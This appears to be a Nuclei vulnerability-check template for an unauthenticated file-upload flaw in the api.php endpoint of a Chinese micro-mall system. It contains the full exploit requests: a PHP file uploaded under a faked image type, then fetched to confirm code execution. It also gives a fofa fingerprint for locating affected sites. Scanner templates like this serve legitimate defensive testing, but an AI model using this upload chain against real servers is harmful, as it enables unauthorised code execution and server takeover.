http:
    - extractors:
        - group: 1
          internal: true
          name: uploadfile
          part: body
          regex:
            - (\w+\.php)
          type: regex
      raw:
        - |
          POST /api/api.php?mod=upload&type=1 HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
          Content-Type: multipart/form-data; boundary=d0b7a0d40eed0e32904c8017b09eb305

          --d0b7a0d40eed0e32904c8017b09eb305
          Content-Disposition: form-data; name="file"; filename="rce.php"
          Content-Type: image/png

          <?php print(111*222);unlink(__FILE__);?>
          --d0b7a0d40eed0e32904c8017b09eb305--
    - matchers:
        - part: body
          type: word
          words:
            - "24642"
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /upload/{{uploadfile}} HTTP/1.1
          Host: {{Hostname}}
id: weishangcheng-api_php-File-upload
info:
    author: Superhero
    description: |-
        fofa: body="/Mao_Public/js/jquery-2.1.1.min.js"
        微商城系统 api.php 接口处存在任意文件上传漏洞，未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
    name: 微商城系统 api.php 文件上传致RCE漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247486660&idx=1&sn=423ccf53a70dda0706913e504388c2aa&chksm=c267b9f7f51030e1386f01d11ae07d658aae48875afe1c259c66f0f474dcf7159dcfeffbce45&token=522460222&lang=zh_CN#rd
    severity: high
    tags:
        - jQuery
